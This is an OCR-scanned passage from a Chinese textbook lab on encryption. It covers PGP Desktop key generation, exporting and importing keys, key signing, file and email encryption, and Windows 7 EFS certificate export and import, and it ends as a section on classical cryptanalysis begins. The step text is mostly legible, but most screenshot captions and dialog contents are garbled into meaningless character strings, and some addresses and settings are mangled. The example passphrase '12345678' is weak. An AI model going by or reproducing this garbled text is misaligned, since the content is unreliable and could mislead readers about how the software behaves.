步骤 6: 单 击 “ 下 一 步 按 钮 ,进入 “*PGP 密 钥 生成 助手 ”界面 ,如 图 5-34 所 示 。 

步骤 7: 单 击 “ 下 一 步 ” 按 钮 ,进入 “分 配 名 称 和 上 邮件 ”界面 ,如 图 5-35 所 示 , 在 “全 名 ” 文 
本 框 中 输入 用 户 名 , 如 userl, 在 “主要 邮件 ”文本 框 中 输入 用 户 电 子 邮件 地 址 , 如 
huanglg2005(@21cn. com 。 
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许可 证 席位 =: 趟 限 
许可 证 到 期 : 未 不 

3 a 

bo I oo | 
Fe per pop me 
租 E 电 E23 全 盘 


必 标 移动 中标 上 字 习 关于 PGP Desktop8 洒 个 功 配 


上 EW [CR [ED 








图 5-32 “授权 成 功 "界面 








用 户 类 型 
此 助手 档 必 助人 配置 FP 并 初 蝗 化 您 AE 钥 。 


启用 用 户 请 选择 一 个 。 


at 回 我 是 一 个 新 用 户 A。 


EE 我 前 使 用 过 PGP 并 且 我 已 经 有 密 祠 们 。 





7 ee 





图 5-33 “用 户 类 型 界面 























PGP 密 钥 生 成 助手 


此 助手 档 帮助 您 生成 一 个 新 byPGp 案 希 。 一 个 谈 钥 和 要 每 个 参与 者 有 一 个 安全 
邮件 入 下 。 当 使 用 宝 钥 创建 PGP 文 档 和 PGP 泣 盘 时 ， 也 将 提供 最 高 程度 的 便利 。 


如 果 您 要 更 多 关于 密 钥 和 PGP 怎 么 工作 的 信息 ， 请 选择 >GP Desktop 的 帮 动 荣 


名 


入 息 将 在 下 面 显示 。 





如 果 你 使 用 一 个 硬件 令 牌 清 现在 插入 它 。 您 8 


人 让 





选择 下 一 步 继续 ， 或 哎 过 到 下 一 区 域 





ES ED) CR (CR 
图 5-34 “PGP 密 钥 生成 助手 ”界面 
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分 配 名 称 和 邮件 


个 都 有 一 个 与 其 = 件 : 信和 知道 人 
和 放生 名 名 称 和 邮件 地 址 让 您 的 通信 人 知道 他 


主要 邮件 日 Xesaezo0sezle E>] 








单 击 高级 进 行 更 多 的 写 名 设置 。 
< D 





] Cm) 


[ED [看 








图 5-35 “分 配 名 称 和 邮件 ”界面 


步骤 8: 单 击 “ 高 级 "按钮 ,可 打开 * 高 级 密 钥 设置 "对话 框 ,如 图 5-36 所 示 ,可 对 各 项 密 


钥 参 数 进行 设置 。 








密 钥 类 型 (1): 
回 生成 分 离 签名 子 密 钥 
签名 密 钥 大 小 S): 。 2048 1024- 4096 
加 密 密 角 大小: 。 2048 1024- 4096 
到 0): ” 回 永 不 VW) 
算法 
允许 的 : ” 辆 AES 图 cAsr 园 TrpkebpEs 园 IDEA 园 Twofsh 
Wi EEC 
和 散 列 
允许 的 :” 园 shA-2.255 。。 园 SHA-2-384 国 SHA-2-512 
团 RiPevp-160 。 国 ShA-! 
让 
压缩 
允许 的 : 园 Bzpz 园 zuB 回 zp 团 无 () 
首选 E): ”| 下 压缩 z» 

















图 5-36 “高 级 密 钥 设置 "对 话 框 


步骤 9: 单 击 “ 确 定 ” 按 钮 ,返回 “分 配 名 称 和 邮件 "界面, 单 击 “ 下 一 步 ” 按 钮 ,进入 “创建 
口令 ”界面 ,如 图 5-37 所 示 。 选 中 “显示 键入 " 复 选 框 ,在 “输入 口令 ”文本 框 中 输入 用 户口 
输入 口令 ”文本 框 中 再 次 输入 相同 口令 。 


令 , 如 12345678, 在 “本 





说 明 这 里 的 口令 用 来 保护 用 户 的 私 铀 ,实际 使 用 时 ,口令 至 少 应 该 有 8 位 字符 长 度 ， 
并 包含 数字 和 字母 。 如 果 取 消 选中 “显示 键入 ” 复 选 框 ,输入 的 口令 将 不 回 显 , 这 样 可 防止 口 
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创建 口令 
爷 8 筷 胃 将 受 口令 保护 。 保 持 您 的 重要 口令 秘密 性 ， 不 要 把 它 写 下 来 * 


信和 口令 至 少 应 该 有 8 位 字符 长 度 ， 并 包含 数字 和 字母 。 


Ge 7 








= me 





图 5-37 “创建 口令 "界面 


令 被 别人 看 到 。 
步骤 10: 单 击 “ 下 一 步 ” 按 钮 ,开始 生成 密 钥 ( 公 钥 ) 和 子 密 钥 ( 私 钥 ) ,如 图 5-38 所 示 。 











密 钥 生成 进度 
以 下 某 些 步 架 也 许 各 要 几 分 钟 才能 完成 。 


启用 用 户 密 钥 生成 步 豫 : 
二 六 而 v 生成 铀 
v 生成 了 本 外 


其 喜 
您 成 功 的 生成 了 一 个 允许 您 接收 安全 消息 和 签名 文档 9PGP 宣 钥 对 * 
点 击 下 一 步 添加 您 的 新 室 角 对 到 您 的 证 得 环 并 继续 * 


5) 下 =- 步 D3 [时 消 [帮助 - 
图 5-38 生成 密 钥 和 子 密 钥 








步骤 11: 单 击 “下 一 步 ?按钮 ,进入 "PGP 全 球 名 录 助 手 ” 界 面 .如 图 5-39 所 示 。 

步骤 12: 如 果 不 想 把 生成 的 公 钥 添加 到 PGP 全 球 名 录 中 ,. 单 击 “ 跳 过 ”按钮 ,再 单 击 “ 下 
一 步 ” 按 钮 ,直至 完成 。 

步骤 13: 选择 “开始 ”一 “所 有 程序 ”>“PGP” 一 “PGP Desktop” 命 令 , 打 开 “PGP 
Desktop - 全 部 密 钥 ” 主 窗口 ,如 图 5-40 所 示 。 

生成 的 密 钥 对 ( 公 钥 和 私 钥 ) 默 认 保 存在 *C:\Users\Administrator\Documents\PGP” 
文件 夹 中 ,如 图 5-41 所 示 ,注意 复制 备份 。 由 于 私 钥 也 是 以 文件 形式 保存 在 硬盘 中 ,因此 ， 
设置 的 私 钥 保护 口令 一 定 要 强壮 。 
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PGP 全 球 名 录 助 手 
Pe” 名录 核验 ， 存 竺 ， 并 分 发 公 角 。 a 家, 全 
球 目录 提供 担保 此 笃 钥 是 由 此 邮件 : 拉 有 的 守 钥 。 这 将 多 许 其 他 人 验证 来 
启用 用 户 自 六 个 霹 负 的 莹 名 并 以 它 加 宇 消 息 * 
许可 这 个 助手 构 帮 助 您 发 布 您 的 公 钥 到 PGP 全 球 名 录 *。 


如 果 您 不 是 很 确定 要 提交 您 8 密 乌 到 此 全 球 名 录 ， 您 可 以 在 今后 任何 时 假 选择 
发 布 到 全 球 名 录 荣 单项 











EE Ca Cy 





图 5-39 “PGP 全 球 名 录 助 手 ” 界 面 





























huanglg2005@21cn.com 


1 个 密 诅 已 迁 择 








图 5-40 “PGP Desktop - 全 部 密 钥 ” 主 窗口 






































ONE DIE 5] 
文件 (月 ”编辑 (E) ”查看 (V) 工具 () 帮助 (H) 
组 织 ” 包含 到 库 中 E> 新 建文 件 去 





廊 收 训 夫 ga 
总 下载 图 pubring.pkr 
PE 图 :ecringskr 
司 后 的 位 和 
司库 
) 2 人 于 铺 











图 5-41 生成 的 密 钥 对 
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3) 密 钥 的 导出 与 导入 

(1) 密 钥 的 导出 。 公 钥 是 公开 的 ,要 发 布 公 钥 ,首先 必须 将 公 钥 从 证 书 中 导出 。 

步骤 1: 在 如 图 5-40 所 示 的 “PGP Desktop - 全 部 密 钥 ” 主 窗口 中 , 右 击 右 侧 窗 格 中 的 用 
户 密 钥 Cuserl) ,在 弹出 的 快捷 菜单 中 选择 “导出 ”命令 ,打开 “导出 密 钥 到 文件 ”对 话 框 ,如 
图 5-42 所 示 。 





保存 在 0): 。 辆 入 文档 ~ 四 全 已 国 - 
名 称 四 修改 日 其 


县 pGp 2016/7/10 sz 由 
Snaglt Catalog 2016/7/5 12:43 


2011/6/17 23:4; 
201U617 23:4: = 
上 














取消 _ 











图 5-42 “导出 密 钥 到 文件 ”对 话 框 


步骤 2: 选择 保存 目录 后 ,再 单 击 * 保 存 ? 按 钮 , 即 可 导出 userl 用 户 的 公 钥 。 

说 明 如 果 选 中 了 “包含 私 钥 ” 复 选 框 , 则 会 同时 导出 私 钥 。 但 是 私 钥 是 不 能 让 别人 知 
道 的 ,因此 在 导出 公 钥 时 不 要 包含 私 钥 , 即 不 要 选中 该 复 选 框 。 

公 钥 文件 的 扩展 名 为 .asc( ASCII 密 钥 文件 ) ,该 文件 可 用 记事 本 打开 查看 。 公 钥 文 件 
导出 后 ,就 可 将 它 通过 电子 邮件 、 网 络 共享 .FTP 服务 器 等 方式 进行 公布 ,以 便 其 他 用 户 下 
载 并 导入 使 用 。 

若 要 新 建 PGP 密 钥 对 ,可 选择 菜单 中 的 “文件 ”>“ 新 建 PGP 密 钥 ”命令 ,打开 PGP 密 
钥 生 成 助手 ,以 完成 PGP 密 钥 对 的 创建 。 

步骤 3: 为 了 便于 后 续 的 操作 ,还 要 在 另 一 主机 中 创建 一 个 名 为 user2 的 用 户 的 密 钥 
对 ,创建 过 程 类 似 于 userl 用 户 的 密 钥 对 的 创建 ,这 里 不 再 袭 述 。 然 后 把 user2 用 户 的 公 钥 
文件 (user2. asc) 导 出 ,以 便 userl 用 户 进行 导入 使 用 。 

(2) 密 钥 的 导入 。 要 给 其 他 用 户 发 送 加 密 的 文件 ,需要 导入 其 他 用 户 的 公 钥 。 

步骤 1: 将 来 自 user2 用 户 的 公 钥 文件 (user2. asc) 下 载 到 自己 的 计算 机 上 ,然后 双击 
user2. asc 公 钥 文件 ,打开 “选择 密 钥 ”对 话 框 ,如 图 5-43 所 示 。 
































图 5-43 “选择 密 钥 ”对 话 框 
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步骤 2: 单 击 “导入 ”按钮 , 即 可 导入 user2 的 公 钥 。 此 时 ,导入 的 user2 的 公 钥 还 未 校 





验 , 在 “PGP Desktop - 全 部 密 钥 ? 了 
步骤 3: 在 “PGP Desktop -全 
捷 菜 单 中 选择 “签名 ”命令 ,如 图 5- 


EE 


1 人 





窗口 的 “已 校 验 ” 栏 中 显示 为 灰色 。 
部 密 钥 ” 主 窗 口中 , 右 击 刚 导入 的 user2 公 钥 ,在 弹出 的 快 
44 所 示 , 打 开 “PGP 签名 密 钥 ”对 话 框 ,如 图 5-45 所 示 。 


iserl 
iser2 


过 外 已 过 择 





图 5-44 对 user2 公 钥 进行 签名 


密 钥 /用 户 各 


| 


nD, 您 能 证 明基 于 您 拥有 的 直接 一 手 信息 的 密 钥 和 附属 用 户 ID 实 际 上 是 属于 已 识别 


在 签名 前 ， 确 认 密 钥 您 已 以 支 全 的 方式 发 给 了 该 所 有 人 或 您 核验 了 指纹 是 此 持 有 人 的 * 


user2 <iamxf@21cn.com> AD17 50E7 0859 0DCD 1F86 B374 D8C0 5FCF 456D 886A| 


指纹 








回 允许 签 名 被 导出 。 其 他 人 可 能 信任 您 的 签名 A)。 


Lae ] (mio | La ] 








图 5-45 “PGP 签名 密 钥 "对话 框 


步骤 4: 单 击 “ 确 定 ” 按 钮 ,打开 “PGP 为 选择 密 钥 输入 口令 ”对 话 框 ,如 图 5-46 所 示 。 





签名 密 钥 5): 


userl huangl e2005821en com》 (RSA/2048) 


有 3 口令 (p): 





hz545675 
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图 5-46 输入 口令 
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步骤 $: 在 “签名 密 钥 的 口令 ”文本 框 中 ,输入 创建 userl 用 户 的 密 钥 对 时 设置 的 保护 私 
钥 的 口令 12345678( 选 中 “显示 键入" 复 选 框 可 显示 输入 的 口令 ), 然 后 单 击 “ 确 定 ” 按 钮 , 完 
成 签名 操作 。 此 时 user2 的 公 钥 在 “已 校 验 ” 栏 中 显示 为 绿色 ,表示 该 密 钥 有 效 。 
说 明 ”如果 对 话 框 中 显示 “当前 选择 密 钥 的 口令 已 缓存 ”信息 ,如 图 5-47 所 示 , 则 不 必 
输入 口令 ,直接 单 击 “ 确 定 ” 按 钮 即 可 。 





签名 密 钥 (5): 
userl huanglg2005821en con> (ESA/2048) 





当前 选择 密 钥 的 口令 已 缓存 。 

















图 5-47 口令 已 缓存 


步 又 6: 使 用 相同 的 方法 ,在 user2 的 主机 中 导入 userl 的 公 钥 。 

4) PGP 文件 的 加 密 和 解密 

userl 用 户 使 用 user2 用 户 的 公 钥 对 文件 进行 加 密 ,user2 用 户 使 用 自己 的 私 钥 进行 
解密 。 

(1) 文件 加 密 的 步骤 如 下 。 

步骤 1: 在 userl 的 主机 上 , 右 击 需要 加 密 的 文件 PGP. doc, 在 弹出 的 快捷 菜单 中 选择 
“PGP Desktop”>“ 使 用 密 钥 保护 “PGP. doc”” 命 令 , 如 图 5-48 所 示 , 进 入 “添加 用 户 密 钥 ” 
界面 。 





转 EGG 并 Email- 

于 “PpGP.rar" 并 E-mail 
还 原 以 前 的 版 本 (V) 
发 送 到 (N) 上 

»| 二 "pGpdoc 3pGp 夺 编外 

有 创建 特 解 宇文 档 
Ey 
AR 使 用 口令 保护 "PGpdoc 
ae(D) 加 过 到 userl <huanglg2005@21cn.com> 
重 命名 (M) 签名 为 userl <huanglg2005@21cn.com> 
必 ER 二 0 "PGP.doc" 到 PGP 网 阁 共 享 .… 

PGPi 厂 "PGpdoc 


图 5-48 ”使 用 密 钥 保护 
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步骤 2: 单 击 “ 移 除 ” 按 钮 , 先 删除 userl 用 户 密 钥 。 再 单 击 * 添 加 ”按钮 左 侧 的 下 拉 箭 
头 。 选 择 user2 用 户 密 钥 。 再 单 击 * 添 加 ”按钮 ,把 user2 用 户 密 钥 添加 到 下 面 的 列表 框 中 ， 
如 图 5-49 所 示 ,表示 使 用 user2 用 户 的 公 钥 对 文件 进行 加 密 , 只 有 使 用 user2 用 户 的 私 钥 进 
行 才能 解密 。 








添加 用 户 密 钥 
为 总 要 加 至 的 收 件 人 输入 用 户 写 钼 * 


为 个 密 钥 输 入 用 户 名 或 邮件 地 址 


er2 Cianxfa2len com》 








:er2 <iamdi@21cn.com> 











上- 步 @)] 丰 = 步 中 (取消 |] (部 助 ] 











图 5-49 “添加 用 户 密 钥 ”界面 


























签名 并 保存 
和 PE 过 多 许 吉 9y 以 件 人 术 直 性 。 在 下 8 位置 确认 低 入 名 用 的 


签名 密 钥 





userld 2005@2locom> 





保存 位 置 


CUserswdmnstatorDesktop EE” 


保存 分 高 的 答 名 





《上 一 步 @)] 革 一 步 吕 [取消 ] 帮助 |] 














图 5-50 “签名 并 保存 界面 


步骤 4: 单 击 * 下 一 步 ? 按 钮 , 则 开始 生成 密 钥 加 密 文 件 PGP. doc. pgp, 然 后 将 该 加 密 文 
件 传 送 给 user2 用 户 。 
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(2) 文件 解密 的 步骤 如 下 。 
步骤 1: 在 user2 用 户 的 主机 上 ,下 载 userl 用 户 传送 过 来 的 加 密 文件 PGP. doc. pgp， 
双击 该 文件 ,开始 用 user2 的 私 钥 进行 解密 ,解密 结果 如 图 5-51 所 示 。 








PGP 压缩 包 


辜 pGpd 








图 5-51 解密 结果 


步骤 2: 右 击 已 解密 文件 PGP. doc, 在 弹出 的 快捷 菜单 中 选择 “提取 ”命令 ,打开 “浏览 
文件 夹 ” 对 话 框 ,选择 保存 文件 夹 后 , 单 击 “ 确 定 ” 按 钮 。 在 保存 文件 夹 中 打开 已 解密 文件 
PGP. doc, 查 看 解密 内 容 。 

5) 电子 邮件 的 加 密 、 解 密 和 签名 验证 

userl 用 户 要 发 送 一 封 重要 邮件 给 user2 用 户 , 为 了 证 明 此 邮件 是 userl 发 送 的 ,需要 
使 用 userl 的 私 钥 对 所 发 送 的 邮件 进行 数字 签名 ,为 了 保密 起 见 , 需 要 使 用 user2 的 公 钥 对 
签名 邮件 进行 加 密 。user2 用 户 收 到 此 邮件 后 , 先 用 自己 的 私 钥 进 行 解 密 , 再 用 userl 的 公 
钥 验 证 此 邮件 确实 是 userl 用 户 所 发 送 的 。 

(1) 电子 邮件 的 加 密 和 数字 签名 的 步骤 如 下 。 

步骤 1: 在 userl 用 户 的 主机 中 .打开 Outlook 2010 程序 ,准备 给 user2 用 户 (iamxf@ 
21cn. com) 发 送 的 一 封 新 邮件 ,如 图 5-52 所 示 。 

步骤 2: 右 击 任务 栏 中 的 PGP 程序 托盘 图 标 田 ,在 弹出 的 如 图 5-53 所 示 的 快捷 菜单 中 
选择 “当前 窗口 >“ 加密 & 签名 ”命令 ,打开 “ 密 钥 选择 ”对 话 框 。 

步骤 3: 双击 “从 该 列表 拖拉 名 称 到 收 件 人 列表 ”列表 框 中 的 user2 密 钥 ,再 双击 “ 收 件 
人 ”列表 框 中 的 userl 密 钥 , 即 “ 收 件 人 ”列表 框 中 仅 有 user2 密 钥 ,结果 如 图 5-54 所 示 ,表示 
将 使 用 user2 的 公 钥 来 加 密 邮 件 内 容 。 

步骤 4: 单 击 “ 确 定 ” 按 钮 ,打开 “PGP Desktop - 输入 口令 ”对 话 框 ,如 图 5-55 所 示 ,默认 
已 选择 userl 的 密 钥 ( 私 钥 ) 作 为 签名 密 钥 ,因为 当前 选择 密 钥 的 口令 已 缓存 ,所 以 不 必 再 次 
输入 userl 的 私 钥 保护 口令 。 
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Eh AA -部件 (HTMD pp 
部 件 | 手 入 选 顺 。 设置 文本 格式 。 市 网 © 
EE ons bl 
筷 i pe 
| 由 -A-| 匡 要 者 湖 毕 字 | 于 和 本科 5 - 四 同人 
ee ® MS | Sn CE 
收 件 人 iamxfe2lcn con: 
9 [ao- | 
主要 (U): 来 自 user1 的 加 密 并 答 名 部 件 
司 
这 是 需要 使 用 userl 私 铀 进行 签名 并 且 使 用 user2 公 角 进行 加 密 的 8 有 文 邮 件 内 容 ! " 国 
加 
人 A、Windows 病 面 六 过 不 可 用 。 ~ 














图 5-52 创建 新 邮件 



































从 该 列表 拖拉 名 称 到 收 件 人 列表 .。 已 校 验 大 小 
回 userl <huanglg2005@21cn.com> © 2048 

收 件 人 Be 大 小 
[Euser? <iamxf@21cn.com> © 2048 | 


回 安全 网 读 器 (S) 
回 筷 规 加 守 (6) 





图 5-54 选择 加 密 密 钥 
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签名 密 钥 (5): 
userl Chusngl e2005821en con> (RSA/2048) 





当前 选择 密 钥 的 口令 已 缓存 。 

















图 5-55 ”当前 选择 密 钥 的 口令 已 缓存 


步骤 5: 单 击 “确定 ”按钮 ,然后 删除 原 邮 件 内 容 ( 明 文 ) ,再 右 击 选择 “粘贴 ”命令 ,此 时 ， 
窗口 中 已 包含 被 加 密 的 邮件 内 容 , 如 图 5-56 所 示 。 这 段 密 文 是 先 用 userl 的 私 钥 进 行 签 


名 ,再 用 user2 的 公 钥 进行 加 密 之 后 生成 的 。 





EI A 来 自 userl 的 加 密 并 签名 闻 件 - 部 件 (HTMU 三 


[EE 





- 马 围 哺 目 附加 文件 。 后续 标志 ~ 


钱 bo 顶 目 ” ?重要 性 - 高 
了 Ty-A-| 匡 要 当 漳 | 汪 和 Bes 


名 % [caibr 基文 [ -| 五 -AN |: 
和 由 





是 重要 性 - 低 





共通 文 志 二 姓名 添加 标 虽 本 


显示 比例 


| 显示 比 本 





| 收 件 人 - mafa2l cn con; 




















主要 (U): 来 和 user1 的 加 密 并 签名 邮件 








» 
一 -BEGIN PGP MESsAGE 一 一 ， 

Version: PGP Desktop 10.1.1 (Build 10)» 

Charset: utf-8+ 

+» 
qANQR1DBwEwDxQqycCTUPYOBB/oDilfCeNPKE7UHEmC6EfO7UxhaQy/sfci7H9CNF。 
2HJkKhlpKDyifWIl24q3uMblVyz WIGHK7vUFTdyeC7XSOh37V2j6hFpZzQtdya1uW» 
2GlicpGNquAp7EiPdIt 1nEbL3EyDdzMqak182KAoLiu/qgSWbIRCNOZkSX/BFiv. 
NWESOK/RJOPCUpPdE47Gmp4A2BjzapvKBTZNZ]9xGjQOObH2/8KKajCTdWIScONG 
q/nSmNutO/UaSwjnOL7/EQ+YZwGr5Sz7lzaalw5Ts6+/3DfFe+0n4TOMMRBXxO" 
Plvr505v6PpS/HYKOER2FiuDkBzhRMGWOmTrBCtVQGcIYB80sD8AbSc3aAl3UxY. 
cKMHGYzf6+j2KdvRJLqS2YEd93sjrd3NUVnXEIpCIsSCCEm6IMW8340dSc8OIOgDj, 
Kumh+gHTeJkNYoAGmSmxXtGr38scSyGnwnYwOCD7ULTWG/dcDIQNrEEtSzpQ)» 
dovp287/mEnu4e+MMzAEATOIxxBSFUUIgE3cNOGUkOUegkSxcGr8UGLixD7taLe 
2UgAVTK/fULEnjbFmHKI3TSGld94qkHpDNcz1NcCwafqpxlvCOJqYk8Muzoc58MrRt* 
15ohYOTNk4wVCqUI2dCX3N2KvU3Ezb+FrEaTeYOmtX4EFhLabAqFYrkliyY4pRqfav 
X8e6eMIUJ3ms88mdDY1+8+omseMz9nab0lseZtVIHiqaWF4+MMoQRSTuSeTPQFNX" 
V3sYZjCLgY2khw/USDvhS6ndLa01mFyAUXP2pbVfz3KILu7ynsUhNtWfFpHIWtS3. 
lleg+xoBb6PvhzOEZYkFwilpHEX2fk/3Gh+7UExahBh2LrQJDmiYgkBt+pav5mw 
KLfTcchsopy/didT1R7hlOO5StgGRnloHP2Qg2X0eQlfSEzqGUOgts5Nqw/WCxfpu 
2Zqdsr 

=aBy3" 

一 END PGP MESSAGE 一 一 ' 





四 可 

















人 windows 高 而 当 过 不 可 用 . 

















图 5-56 生成 的 邮件 密 文 


步骤 6: 单 击 “发 送 " 按 钮 ,将 加 密 后 的 邮件 发 送 给 user2 用 户 。 
(2) 电子 邮件 的 解密 和 签名 验证 的 步骤 如 下 。 


步骤 1: 在 user2 用 户 的 主机 中 ,用 Outlook 2010 程序 接收 userl 用 户 发 送 过 来 的 加 密 
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邮件 。 

步骤 2: 打开 需 解密 的 邮件 ,选中 全 部 已 加 密 的 邮件 内 容 , 右 击 任务 栏 中 的 PGP 程序 托 
盘 图 标 网 ,在 弹出 的 快捷 菜单 中 选择 “当前 窗口 ”解密 & 校 验 "命令 ,在 打开 的 “文本 阅 
读 器 ?对 话 框 中 ,可 以 看 到 校 验 状态 是 有 效 签名 ”, 解 密 后 的 明文 为 中 间 那 段 文 字 , 如 图 5-57 
所 示 , 单 击 “ 确 定 ” 按 钮 。 








~ 已 签名 : 2016/7/10 18:26:41 
已 校 验 : 2016/7/10 18:39:13 
”BEGIN PGP DECRYPTED/VERIFIED MESSAGE ™ 


训 呈 天 要 使 用 user1 私 钥 进 行 签名 并 且 使 用 user2 公 租 进 行 加 密 的 明文 邮件 内 容 ! 


™* END PGP DECRYPTED/VERIFIED MESSAGE "中 




















图 5-57 解密 & 校 验 后 的 邮件 内 容 


5.4.3 任务 3: Windows 7 加 密 文件 系统 的 应 用 


1. 任务 目标 

(1) 掌握 EFS 加 密 文件 的 使 用 方法 。 

(2) 理解 备份 密 钥 的 重要 性 。 

2. 任务 内 容 

(1) 用 EFS 加 密 文件 。 

(2) 导出 证 书 。 

(3) 导入 证 书 。 

3. 完成 任务 所 需 的 设备 和 软件 

安装 有 Windows 7 操作 系统 的 计算 机 1 台 , 有 NTFS 分 区 。 

4. 任务 实施 步骤 

1) 用 EFS 加 密 文件 

步骤 1: 新 建 一 个 账户 user, 并 使 用 账户 user 登录 系统 。 

步骤 2: 在 NTFS 分 区 上 新 建 一 个 test 文件 夹 , 在 该 文件 夹 中 建立 一 个 test. txt 文本 文 
件 , 在 该 文本 文件 中 任意 输入 一 些 内 容 。 

步骤 3: 开始 利用 EFS 加 密 test. txt 文件 。 右 击 test 文件 夹 , 在 弹出 的 快捷 菜单 中 选 
择 “ 属 性 ”命令 ,打开 “test 属性 ”对 话 框 ,在 “常规 ”选项 卡 中 单 击 “ 高 级 ”按钮 ,打开 “高 级 属 
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性 ”对 话 框 ,如 图 5-58 所 示 。 

步骤 4: 选中 “加 密 内 容 以 便 保护 数据 " 复 选 框 , 单 击 “ 确 定 ” 按 钮 返回 “test 属性 对话 
框 ,再 单 击 “ 确 定 ” 按 钮 ,打开 “确认 属性 更 改 ” 对 话 框 ,选中 “将 更 改 应 用 于 该 文件 夹 、 子 文件 
和 文件 ” 单 选 按钮 ,如 图 5-59 所 示 , 单 击 “ 确 定 ” 按 钮 。 


EE 
存档 和 案 引 导 性 
回 司 以 存档 文件 夫 风 你 已经 和 反对 属性 进行 以 下 更 疏 ; 
回 除了 文件 属性 处， 还 多 许 索引 此 文件 夫 中 文件 的 内 容 CD) 加 E 


正本 TX 或 者 是 否 要 将 它 应 用 于 所 有 子 广 


侣 仅 将 更 改 应 用 于 此 文件 去 
| 详细 信息 0) 加 将 更 改 应 用 于 此 文件 夹 、 子 文件 夹 和 广 
CC] 














图 5-58 “高 级 属性 "对话 框 图 5-59 “确认 属性 更 改 " 对 话 框 


此 时 ,test 文件 夹 名 和 test. txt 文件 名 的 颜色 变 为 绿色 ,表示 处 于 EFS 加 密 状态 。 

2) 导出 证 书 

步骤 1: 运行 certmgr. msc 命令 ,打开 证 书 管理 器 窗口 ,展开 左 侧 窗 格 中 的 “证 书 - 当前 
用 户 ”=>“ 个 人 ”一 “证 书 ” 选 项 ,在 右 侧 窗 格 中 右 击 user 账户 名 ,在 弹出 的 快捷 菜单 中 选择 
“所 有 任务 ”一 “导出 ”命令 ,如 图 5-60 所 示 。 


加 cermor (ES -SA aa 
文件 月 ”报信 A] 下 看 M 可 二 0) 
工区 下 可 [JEEiToi 
































5-60 证 书 管理 器 窗口 


步骤 2: 在 打开 的 证 书 导 出 向 导 中 , 单 击 * 下 一 步 "按钮 ,出现 “导出 私 钥 ?界面 ,选中 * 是 ， 
导出 私 钥 ” 单 选 按钮 ,如 图 5-61 所 示 。 

步骤 3: 单 击 * 下 一 步 ?按钮 ,出 现 * 导 出 文件 格式 ?界面 ,选中 * 个 人 信息 交换 - PKCS # 
12(. PFX)” 单 选 按钮 ,如 图 5-62 所 示 。 
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导出 私 钥 
您 可 以 选择 将 私 钥 和 证 书 一 起 号 出 。 





WP 如 果 要 将 私 钥 限 证 书 一 起 号 出 ， 您 必须 在 后 面 一 页 上 键入 密 


您 想 插 私 昌 跟 证 书 一 起 导出 中 ? 
回 是 ， 号 出 私 钥 们 ) 
刁 不 ,不 要 导出 私 钥 0) 








图 5-61 “导出 私 钥 界 面 


证 书 导出 和 导 


导出 文件 格式 
可 以 用 不 同 的 文件 格式 导出 证 书 。 





选择 要 使 用 的 格式 : 
DER 编码 二 进 制 x, 509( CER) O) 
Base64 编码 X_ 509( CER) 全) 
加 密 消 息 语法 标准 ~ PKCS 帮 证 书 (P78) C) 
口 如 果 可 能 ， 则 数据 包括 证 书 路 径 中 的 所 有 证 书 0) 
加 个 人 信息 交换 - PRCS #2( PFX) G) 
因 如 果 可 能 ， 则 数据 包括 证 书 路 径 中 的 所 有 证 书 om 
因 如 果 呈 出 成 功 , 是 除 私 钥 0 
加 导出 所 有 扩展 属性 A) 
出 erosoft 序列 化 证 书 存储 5 SST) 0) 


了 解 正 书 立 件 格式 的 详细 信息 

















[区 上 = 步 @)] 下 = 步 吧 > 
































5-62 “导出 文件 格式 ”界面 


步骤 4: 单 击 “ 下 一 步 ” 按 钮 ,出 现 “ 密 码 ” 界 面 ,输入 密码 以 保护 导出 的 私 钥 , 如 图 5-63 
所 示 。 
步骤 5: 单 击 * 下 一 步 "按钮 ,出现 * 要 导出 的 文件 ?界面 ,指定 要 导出 的 证 书 的 路 径 和 文 
件 名 ,如 图 5-64 所 示 。 单 击 * 下 一 步 按 钮 ,再 单 击 * 完 成 ?按钮 。 导 出 的 证 书 文件 的 扩展 名 
为 . pfx。 

步骤 6: 注销 user 账户 ,以 管理 员 账 户 administrator 登录 系统 ,并 试图 打开 已 被 user 
账户 利用 EFS 加 密 的 test. txt 文件 ,结果 会 出 现 如 图 5-65 所 示 的 结果 ,表示 拒绝 访问 。 


176 


项 目 5 密码 技术 














图 5-63 “密码 "界面 








Ci Wsers\user\user. ?全 














图 5-64 “要 导出 的 文件 "界面 图 5-65 拒绝 访问 


3) 导入 证 书 

如 果 需 要 打开 被 user 账户 利用 EFS 加 密 的 文件 test. txt, 就 必须 获得 user 的 私 钥 。 下 
面 通过 导入 user 的 证 书 (包含 私 钥 ) 来 打开 test. txt 文件 。 

步骤 1: 双击 刚才 导出 的 证 书 文件 user. pfx, 打 开 证 书 导入 向 导 , 单 击 “ 下 一 步 ?按钮 , 确 
认 要 导入 的 文件 路 径 后 ,再 单 击 * 下 一 步 按 钮 ,出 现 * 密 码 ” 界 面 , 输 入 刚才 设置 的 私 钥 保护 
密码 后 , 单 击 * 下 一 步 ?按钮 。 

步骤 2: 在 出 现 的 “证 书 存储 ”界面 中 ,选中 ”根据 证 书 类 型 ,自动 选择 证 书 存储 ? 单 选 按 
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钮 ,如 图 5-66 所 示 。 
步骤 3: 单 击 “ 下 一 步 ” 按 钮 ,再 单 击 “ 完 成 ”按钮 ,弹出 “导入 成 功 ” 的 提示 信息 ,如 图 5-67 
所 示 , 单 击 “ 确 定 ” 按 钮 。 








证 书 存储 
证 书 存储 是 保存 证 书 的 系统 区 域 。 





Windows 可 以 自动 选择 证 书 存储 ， 或 者 您 可 以 为 证 书 指定 一 个 位 置 。 


加 根据 证 书 类 型 ， 自 动 傅 0D 
也 





























[@ | 
图 5-66 “证 书 存储 "界面 图 5-67 导入 成 功 


步骤 4: 此 时 ,再 试图 打开 已 经 被 user 账户 利用 EFS 加 密 的 test. txt 文件 ,结果 能 成 功 
访问 。 

步骤 $: 删除 user 账户 ,再 新 建 同 名 账户 user, 并 以 同名 账户 user 登录 系统 ,并 试图 打 
开 已 被 EFS 加 密 的 test. txt 文件 ,观察 能 否 成 功 打 开 。 


55 拓展 提升 : 密码 分 析 技 术 


所 谓 密 码 分 析 ,就 是 在 未 知 密 钥 的 前 提 下 ,从 密 文 中 恢复 出 明文 或 者 推导 出 密 钥 ,对 密 
码 进行 分 析 的 尝试 。 主 要 是 通过 分 析 密 码 系统 中 的 缺陷 或 通过 数学 统计 手段 以 及 语言 特 
点 ,或 借助 计算 机 等 技术 手段 去 试图 破译 单条 消息 或 试图 识别 加 密 的 消息 格式 ,以 便 借 助 直 
接 的 解密 算法 破译 后 续 的 消息 。 

为 了 更 好 地 理解 什么 是 密码 分 析 技 术 , 下 面 简 单 介 绍 几 种 常见 的 古典 密码 分 析 技 术 。 

1. 穷 举 分 析 

